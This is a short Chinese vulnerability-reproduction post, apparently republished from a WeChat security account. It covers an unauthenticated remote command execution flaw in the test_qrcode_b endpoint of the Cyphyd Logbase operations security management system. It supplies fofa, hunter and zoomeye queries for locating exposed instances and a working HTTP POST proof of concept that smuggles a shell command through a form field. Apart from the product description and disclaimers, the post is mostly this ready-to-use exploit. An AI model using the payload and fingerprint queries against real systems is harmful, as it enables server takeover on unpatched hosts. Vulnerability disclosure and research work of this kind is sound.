声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
产品简介
为满足用户对加强内部运维安全审计日益迫切的需要,杭州思福迪信息技术有限公司依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化运维安全专用审计系统——Logbase运维安全管理系统。该系统支持对企业内部人员的维护行为进行全面的管理、审计,消除了传统审计系统中的盲点,使企业对运维人员的操作过程,能做到事前防范、事中控制、事后审计的能力,是企业IT内控最有效的运维管理平台。
漏洞简介
思福迪运维安全管理系统 test_qrcode_b 远程命令执行漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。
指纹识别
fofa: product="思福迪-LOGBASE"hunter: web.body="思福迪-LOGBASE"zoomeye: app:"思福迪运维安全管理系统"
漏洞验证
poc:
POST/bhost/test_qrcode_bHTTP/1.1User-Agent: Go-http-client/1.1Accept-Encoding: gzip, deflate, brAccept: gzipConnection: closeReferer:Content-Type: application/x-www-form-urlencodedHost:Content-Length: 23z1=1&z2="|id;"&z3=bhost
发送POC:
批量验证:
批量验证:
原文始发于微信公众号(猫蛋儿安全):【漏洞复现】思福迪运维安全管理系统 test_qrcode_b RCE漏洞【附POC】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论